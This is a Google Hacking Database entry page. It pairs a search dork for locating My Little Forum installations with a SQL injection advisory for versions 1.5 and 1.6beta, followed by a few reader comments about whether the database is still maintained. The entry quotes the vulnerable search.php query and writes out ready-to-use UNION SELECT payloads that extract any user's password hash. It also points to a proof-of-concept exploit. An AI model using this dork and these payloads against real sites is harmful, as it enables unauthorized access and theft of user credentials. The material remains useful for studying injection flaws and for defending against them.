GHDB « Hackers For Charity

GHDB

GHDB

Google Search: “powered by my little forum”

rgod rates this entry 10 out of 10.
Submitted: 2005-09-26 00:00:00
Added by: rgod
Hits: 1267
Score: 10

My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: “A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP > 4.1 and a MySQL database.”1) look at the vulnerable code at line 144 inside search.php:… $result = mysql_query(“SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL “. $time_difference.” HOUR,’”.$lang['time_format'].”‘) AS Uhrzeit, DATE_FORMAT(time + INTERVAL “.$time_difference.” HOUR, ‘”.$lang['time_format'].”‘) AS Datum, subject, name, email, hp, place, text, category FROM “.$forum_table.” WHERE “.$search_string.” ORDER BY tid DESC, time ASC LIMIT “.$ul.”, ” .$settings['search_results_per_page'], $connid);…now goto the search page, select “phrase”, and type:[whatever]%’ UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name=’[username]‘ /*if magic quotes are off you will have (guess?…) any admin/user password hash’cause $searchstring var is not filtered…u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:…$result = mysql_query(“SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL “.$time_difference.” HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM “.$db_settings['forum_table'].”WHERE “.$search_string.” ORDER BY tid DESC, time ASC LIMIT “.$ul.”, “.$settings['search_results_per_page'],$connid);…you have same results, deleting a statement in injection string:[whatever]%’ UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name=’[username]‘ /*

Comments:


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply